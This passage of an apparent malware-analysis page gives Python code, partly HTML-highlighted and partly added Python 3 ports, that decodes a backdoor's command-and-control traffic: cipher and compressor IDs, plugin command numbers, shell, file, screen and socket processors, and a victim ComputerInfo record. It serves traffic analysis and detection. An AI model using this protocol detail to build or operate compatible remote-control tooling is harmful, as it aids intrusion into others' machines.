<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
<span class="c">#print "plain size = " + hex(plain_size)</span>
<span class="n">cryptor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">20</span><span class="p">:]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">header_size</span><span class="p">:</span><span class="n">header_size</span><span class="o">+</span><span class="n">body_size</span><span class="p">]</span>
<span class="k">if</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"51298f741667d7ed2941950106f50545"</span><span class="p">:</span> <span class="c"># default</span>
<span class="k">print</span> <span class="s">"crypto -> default"</span>
<span class="k">return</span> <span class="n">body</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"c30b1a2dcb489ca8a724376469cf6782"</span><span class="p">:</span> <span class="c"># rc4</span>
<span class="k">print</span> <span class="s">"crypto -> rc4"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="k">return</span> <span class="n">RC4</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"38be0f624ce274fc61f75c90cb3f5915"</span><span class="p">:</span> <span class="c"># Substitution</span>
<span class="k">print</span> <span class="s">"crypto -> Substitution"</span>
<span class="k">return</span> <span class="n">simple_substitution_cipher</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"ba0504fcc08f9121d16fd3fed1710e60"</span><span class="p">:</span> <span class="c"># base64</span>
<span class="k">print</span> <span class="s">"crypto -> base64"</span>
<span class="k">return</span> <span class="n">do_base64</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"b2e5490d2654059bbbab7f2a67fe5ff4"</span><span class="p">:</span> <span class="c"># XTEA in CBC mode</span>
<span class="k">print</span> <span class="s">"crypto -> XTEA"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">52</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="k">return</span> <span class="n">xtea_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">iv</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"2965e4a19b6e9d9473f5f54dfef93533"</span><span class="p">:</span> <span class="c"># Blowfish</span>
<span class="k">print</span> <span class="s">"decrypt -> Blowfish"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">52</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="k">return</span> <span class="n">blowfish_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"8746e7b7b0c1b9cf3f11ecae78a3a4bc"</span><span class="p">:</span> <span class="c"># XOR</span>
<span class="k">print</span> <span class="s">"decrypt -> xor"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">40</span><span class="p">]</span>
<span class="k">return</span> <span class="n">xor</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"46c5525904f473ace7bb8cb58b29968a"</span><span class="p">:</span> <span class="c"># 3DES</span>
<span class="k">print</span> <span class="s">"decrypt -> 3des"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">60</span><span class="p">:</span><span class="mi">68</span><span class="p">]</span>
<span class="k">return</span> <span class="n">des_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"9b1f6ec7d9b42bf7758a094a2186986b"</span><span class="p">:</span> <span class="c"># Camellia</span>
<span class="k">print</span> <span class="s">"decrypt -> camellia"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="k">return</span> <span class="n">camellia_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"crypto -> unknown :"</span> <span class="o">+</span> <span class="n">cryptor_id</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">decompress</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">28</span><span class="p">]</span>
<span class="n">header_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">body_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="n">compressor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">28</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">header_size</span><span class="p">:</span><span class="n">header_size</span><span class="o">+</span><span class="n">body_size</span><span class="p">]</span>
<span class="k">if</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"f37126ad88a5617eaf06000d424c5a21"</span><span class="p">:</span> <span class="c">#default</span>
<span class="k">print</span> <span class="s">"compressor -> default"</span>
<span class="k">return</span> <span class="n">body</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"5fd8ea0e9d0a92cbe425109690ce7da2"</span><span class="p">:</span> <span class="c">#zlib</span>
<span class="k">print</span> <span class="s">"compressor -> zlib"</span>
<span class="kn">import</span> <span class="nn">zlib</span>
<span class="k">return</span> <span class="n">zlib</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"503b6412c75a7c7558d1c92683225449"</span><span class="p">:</span> <span class="c"># aplib</span>
<span class="kn">import</span> <span class="nn">aplib</span>
<span class="k">return</span> <span class="n">aplib</span><span class="o">.</span><span class="n">depack_safe</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"0a7874d2478a7713705e13dd9b31a6b1"</span><span class="p">:</span> <span class="c"># lzo</span>
<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="kn">import</span> <span class="nn">lzo</span>
<span class="k">return</span> <span class="n">lzo</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="bp">False</span><span class="p">,</span> <span class="n">plain_size</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"compressor -> unknown : "</span> <span class="o">+</span> <span class="n">compressor_id</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
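The two envelope parsers above, decrypt() and decompress(), are Python 2 and lean on print statements, .encode('hex') and pycrypto. What follows is an added Python 3 example, not the post's own script: it parses both headers with the offsets and 16-byte IDs shown on the page, ports only the paths that need nothing outside the standard library (the "default" and custom-alphabet base64 crypto paths, the "default" and zlib compressor paths), and bounds-checks header_size, body_size and plain_size against the packet before slicing or inflating, which the original does not. It assumes the page's u32() is a little-endian unpack, that a base64 body carries no stray whitespace, and that plain_size in the compressor header is the expected inflated length (the page passes it to lzo.decompress that way). The packets it builds are constructed for the demonstration, with a placeholder year and a zero checksum.

```python
import base64
import zlib

# Added example: Python 3 port of the envelope parsing in decrypt() and
# decompress(). Offsets and IDs come from the page; little-endian u32 is an
# assumption about the page's u32() helper.

STANDARD_B64 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CUSTOM_B64 = b"B7wAOjbXLsD+S24/tcgHYqFRdVKTp0ixlGIMCf8zvE5eoN1uyU93Wm6rZPQaJhkn"

CRYPTO_DEFAULT = "51298f741667d7ed2941950106f50545"  # body used as-is
CRYPTO_BASE64 = "ba0504fcc08f9121d16fd3fed1710e60"   # custom-alphabet base64
COMP_DEFAULT = "f37126ad88a5617eaf06000d424c5a21"    # no compression
COMP_ZLIB = "5fd8ea0e9d0a92cbe425109690ce7da2"       # zlib

CRYPTO_HEADER_LEN = 36
COMP_HEADER_LEN = 28


def u32(raw):
    """Unsigned 32-bit little-endian (assumed to match the page's u32())."""
    if len(raw) != 4:
        raise ValueError("u32 needs exactly 4 bytes")
    return int.from_bytes(raw, "little")


def p32(value):
    """Inverse of u32; only used to build the constructed samples."""
    return value.to_bytes(4, "little")


def custom_b64decode(body):
    """Map the custom alphabet back to the standard one, then decode strictly."""
    table = bytes.maketrans(CUSTOM_B64, STANDARD_B64)
    return base64.b64decode(body.translate(table), validate=True)


def custom_b64encode(plain):
    """Inverse mapping; only needed to build a sample body."""
    table = bytes.maketrans(STANDARD_B64, CUSTOM_B64)
    return base64.b64encode(plain).translate(table)


def slice_body(data, header_len, header_size, body_size):
    """Check the size fields before trusting them as slice offsets."""
    end = header_size + body_size
    if header_size < header_len or end > len(data):
        raise ValueError("header_size/body_size point outside the packet")
    return data[header_size:end]


def parse_crypto_envelope(data):
    """36-byte header: year, checksum, header_size, body_size, plain_size, cryptor_id."""
    if len(data) < CRYPTO_HEADER_LEN:
        raise ValueError("short crypto header")
    h = data[:CRYPTO_HEADER_LEN]
    env = {
        "year": h[0:4],
        "checksum": u32(h[4:8]),  # read but not verified, as on the page
        "header_size": u32(h[8:12]),
        "body_size": u32(h[12:16]),
        "plain_size": u32(h[16:20]),
        "cryptor_id": h[20:36].hex(),
    }
    env["body"] = slice_body(data, CRYPTO_HEADER_LEN, env["header_size"], env["body_size"])
    return env


def decrypt3(data):
    """Dispatch on cryptor_id; only the two dependency-free paths are ported."""
    env = parse_crypto_envelope(data)
    if env["cryptor_id"] == CRYPTO_DEFAULT:
        return env["body"]
    if env["cryptor_id"] == CRYPTO_BASE64:
        return custom_b64decode(env["body"])
    raise ValueError("unsupported cryptor id " + env["cryptor_id"])


def parse_comp_envelope(data):
    """28-byte header: header_size, body_size, plain_size, compressor_id."""
    if len(data) < COMP_HEADER_LEN:
        raise ValueError("short compressor header")
    h = data[:COMP_HEADER_LEN]
    env = {
        "header_size": u32(h[0:4]),
        "body_size": u32(h[4:8]),
        "plain_size": u32(h[8:12]),
        "compressor_id": h[12:28].hex(),
    }
    env["body"] = slice_body(data, COMP_HEADER_LEN, env["header_size"], env["body_size"])
    return env


def decompress3(data):
    """Inflate at most plain_size+1 bytes so a hostile header cannot zip-bomb us."""
    env = parse_comp_envelope(data)
    if env["compressor_id"] == COMP_DEFAULT:
        plain = env["body"]
    elif env["compressor_id"] == COMP_ZLIB:
        plain = zlib.decompressobj().decompress(env["body"], env["plain_size"] + 1)
    else:
        raise ValueError("unsupported compressor id " + env["compressor_id"])
    if len(plain) != env["plain_size"]:
        raise ValueError("plain_size does not match the decompressed length")
    return plain


def build_crypto_sample(plain, cryptor_id, year=b"2018"):
    """Constructed packet (not captured traffic); checksum left at zero."""
    body = custom_b64encode(plain) if cryptor_id == CRYPTO_BASE64 else plain
    header = (year + p32(0) + p32(CRYPTO_HEADER_LEN) + p32(len(body))
              + p32(len(plain)) + bytes.fromhex(cryptor_id))
    return header + body


def build_comp_sample(plain, compressor_id):
    """Constructed packet for the compressor layer."""
    body = zlib.compress(plain) if compressor_id == COMP_ZLIB else plain
    header = p32(COMP_HEADER_LEN) + p32(len(body)) + p32(len(plain)) + bytes.fromhex(compressor_id)
    return header + body


if __name__ == "__main__":
    pkt = build_crypto_sample(b"hello world", CRYPTO_BASE64)
    print(parse_crypto_envelope(pkt)["cryptor_id"], decrypt3(pkt))
    zpkt = build_comp_sample(b"A" * 64, COMP_ZLIB)
    print(parse_comp_envelope(zpkt)["compressor_id"], decompress3(zpkt))
```

The bounds checks in slice_body() and the plain_size cap in decompress3() are the two things worth carrying into any decoder that runs on untrusted captures: the size fields come from the same peer that wrote the body, so a parser that trusts them can be made to slice outside the packet or inflate far more than expected.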
<span class="k">def</span> <span class="nf">plugin_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">36</span><span class="p">]</span>
<span class="n">version</span> <span class="o">=</span> <span class="n">header</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="n">status1</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
<span class="n">status2</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
<span class="n">processor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">36</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">download_data</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"155bbf4a1efe1517734604b9d42b80e8"</span><span class="p">:</span> <span class="c"># default</span>
<span class="k">print</span> <span class="s">"processor -> default"</span>
<span class="n">download_plugin_header</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">32</span><span class="p">]</span>
<span class="n">download_plugin</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:]</span>
<span class="n">processor_default</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_plugin_header</span><span class="p">,</span> <span class="n">download_plugin</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"f47c51070fa8698064b65b3b6e7d30c6"</span><span class="p">:</span> <span class="c">#CMD file</span>
<span class="k">print</span> <span class="s">"processor -> file"</span>
<span class="n">processor_file</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"f46d09704b40275fb33790a362762e56"</span><span class="p">:</span> <span class="c">#CMD shell</span>
<span class="k">print</span> <span class="s">"processor -> shell"</span>
<span class="n">processor_shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"a3aecca1cb4faa7a9a594d138a1bfbd5"</span><span class="p">:</span> <span class="c">#CMD screen</span>
<span class="k">print</span> <span class="s">"processor -> screen"</span>
<span class="n">processor_screen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"77d6ce92347337aeb14510807ee9d7be"</span><span class="p">:</span> <span class="c">#CMD socket </span>
<span class="k">print</span> <span class="s">"processor -> socket"</span>
<span class="n">processor_socket</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"processor -> unknown: "</span> <span class="o">+</span> <span class="n">processor_id</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
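plugin_cmd() above splits a 36-byte command header (version, cmd, seq, status1, status2, processor_id) and hands the rest to a processor; for the default processor and cmd 3, processor_default() further down the page decodes a fixed-layout ComputerInfo record with UTF-16 fields. Here is an added Python 3 example of both layers, not the post's own code: offsets, IDs and command numbers are the ones on the page; UTF-16LE for the wide fields (the page's decode('utf16') without a BOM), ASCII for the version string, and every sample value (hostname, user, group, version and status words) are assumptions constructed for the demonstration.

```python
# Added example: Python 3 parsing of the plugin command header from plugin_cmd()
# and of the ComputerInfo record that processor_default() decodes for cmd == 3.
# Offsets and IDs are from the page; UTF-16LE and the sample values are assumed.

PLUGIN_HEADER_LEN = 36
COMPUTER_INFO_LEN = 876  # the last field on the page ends at offset 876

PROCESSOR_NAMES = {
    "155bbf4a1efe1517734604b9d42b80e8": "default",
    "f47c51070fa8698064b65b3b6e7d30c6": "file",
    "f46d09704b40275fb33790a362762e56": "shell",
    "a3aecca1cb4faa7a9a594d138a1bfbd5": "screen",
    "77d6ce92347337aeb14510807ee9d7be": "socket",
}
PROCESSOR_DEFAULT = "155bbf4a1efe1517734604b9d42b80e8"
PROCESSOR_SHELL = "f46d09704b40275fb33790a362762e56"
CMD_IS_AUTHED = 2
CMD_COMPUTER_INFO = 3


def u32(raw):
    """Unsigned 32-bit little-endian (assumed to match the page's u32())."""
    if len(raw) != 4:
        raise ValueError("u32 needs exactly 4 bytes")
    return int.from_bytes(raw, "little")


def p32(value):
    return value.to_bytes(4, "little")


def parse_plugin_header(data):
    """36-byte header; everything after it is the processor payload."""
    if len(data) < PLUGIN_HEADER_LEN:
        raise ValueError("short plugin header")
    h = data[:PLUGIN_HEADER_LEN]
    return {
        "version": h[0:4].hex(),
        "cmd": u32(h[4:8]),
        "seq": u32(h[8:12]),
        "status1": u32(h[12:16]),
        "status2": u32(h[16:20]),
        "processor_id": h[20:36].hex(),
        "payload": data[PLUGIN_HEADER_LEN:],
    }


def wide_field(raw):
    """NUL-padded UTF-16LE string (assumed byte order for the page's utf16)."""
    return raw.decode("utf-16-le").rstrip("\x00")


def parse_computer_info(payload):
    """payload = 32-byte plugin header + plugin body, joined as processor_default does."""
    if len(payload) < COMPUTER_INFO_LEN:
        raise ValueError("short ComputerInfo record")
    return {
        "version": payload[16:80].rstrip(b"\x00").decode("ascii", "replace"),
        "computer_name": wide_field(payload[80:208]),
        "user": wide_field(payload[208:336]),
        "group": wide_field(payload[336:848]),
        "others": payload[848:876],  # still marked todo on the page; kept raw
    }


def handle_plugin_cmd(data):
    """Return (processor name, parsed ComputerInfo or None)."""
    hdr = parse_plugin_header(data)
    name = PROCESSOR_NAMES.get(hdr["processor_id"])
    if name is None:
        raise ValueError("unknown processor id " + hdr["processor_id"])
    if name == "default" and hdr["cmd"] == CMD_COMPUTER_INFO:
        return name, parse_computer_info(hdr["payload"])
    return name, None


def _fixed(raw, width):
    """NUL-pad a field to its slot; refuse anything that would overflow it."""
    if len(raw) > width:
        raise ValueError("field too long for its slot")
    return raw.ljust(width, b"\x00")


def build_computer_info(version, computer_name, user, group):
    """Constructed record laid out with the page's offsets (not real traffic)."""
    return (b"\x00" * 16
            + _fixed(version.encode("ascii"), 64)
            + _fixed(computer_name.encode("utf-16-le"), 128)
            + _fixed(user.encode("utf-16-le"), 128)
            + _fixed(group.encode("utf-16-le"), 512)
            + b"\x00" * 28)


def build_plugin_packet(cmd, processor_id, payload, seq=1):
    """Constructed packet; the version and status words are placeholders."""
    return (b"\x01\x00\x00\x00" + p32(cmd) + p32(seq) + p32(0) + p32(0)
            + bytes.fromhex(processor_id) + payload)


if __name__ == "__main__":
    rec = build_computer_info("1.0.0", "WORKSTATION-01", "alice", "WORKGROUP")
    print(handle_plugin_cmd(build_plugin_packet(CMD_COMPUTER_INFO, PROCESSOR_DEFAULT, rec)))
```

Because every field in the record sits at a fixed offset, the length check in parse_computer_info() is what keeps a truncated capture from silently yielding empty strings; the same fixed widths (64, 128, 128, 512 bytes) are also a usable fingerprint when writing a detection for this beacon's first check-in.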
<span class="c">########################################## processor functions ######################################## </span>
<span class="k">def</span> <span class="nf">processor_default</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_plugin_header</span><span class="p">,</span> <span class="n">download_plugin</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">plugin_data</span>
<span class="k">global</span> <span class="n">plugin_size</span>
    <span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 2 -> Processor::IsAuthed"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="c"># ComputerInfo record: version string, then fixed-width UTF-16 name/user/group fields</span>
            <span class="n">computer_info</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="o">+</span><span class="n">download_plugin</span>
            <span class="n">version</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">80</span><span class="p">]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="n">computer_name</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">80</span><span class="p">:</span><span class="mi">208</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="n">user</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">208</span><span class="p">:</span><span class="mi">336</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="n">group</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">336</span><span class="p">:</span><span class="mi">848</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="n">others</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">848</span><span class="p">:</span><span class="mi">876</span><span class="p">]</span>
            <span class="k">print</span> <span class="s">"===================== ComputerInfo ===================="</span>
            <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"version = "</span> <span class="o">+</span> <span class="n">version</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
            <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"computer name = "</span> <span class="o">+</span> <span class="n">computer_name</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
            <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"user name = "</span> <span class="o">+</span> <span class="n">user</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
            <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"group name = "</span> <span class="o">+</span> <span class="n">group</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
            <span class="k">print</span> <span class="n">hexdump</span><span class="p">(</span><span class="n">others</span><span class="p">)</span> <span class="c">#todo: trailing 28 bytes not decoded yet</span>
        <span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"cmd = 3 -> Processor::GetComputerInfo"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 4 -> Processor::ListPlugins"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">5</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 5 -> Processor::StartDownloadPlugin"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="c"># a new download starts: reset the buffer that cmd 6 chunks are appended to</span>
            <span class="n">plugin_data</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">6</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 6 -> Processor::DownloadPlugin"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"Downloading"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="c"># 32-byte chunk header: 16-byte id, 4-byte type, then u32 written / total size / block length</span>
            <span class="n">plugin_id</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
            <span class="n">plugin_type</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
            <span class="n">written</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">24</span><span class="p">])</span>
            <span class="n">plugin_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
            <span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">28</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
            <span class="k">print</span> <span class="s">"ID: </span><span class="si">%</span><span class="s">s | Type: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">plugin_id</span><span class="p">,</span> <span class="n">plugin_type</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">plugin_size</span><span class="p">)</span>
            <span class="n">plugin_data</span> <span class="o">+=</span> <span class="n">download_plugin</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">7</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 7 -> Processor::InstallPlugin"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="n">download_plugin_id</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
